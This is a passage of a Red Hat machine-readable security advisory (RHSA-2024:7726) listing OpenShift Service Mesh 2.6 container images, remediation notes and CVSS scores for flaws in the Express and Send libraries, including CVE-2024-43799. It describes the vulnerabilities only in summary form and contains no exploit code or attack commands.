"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
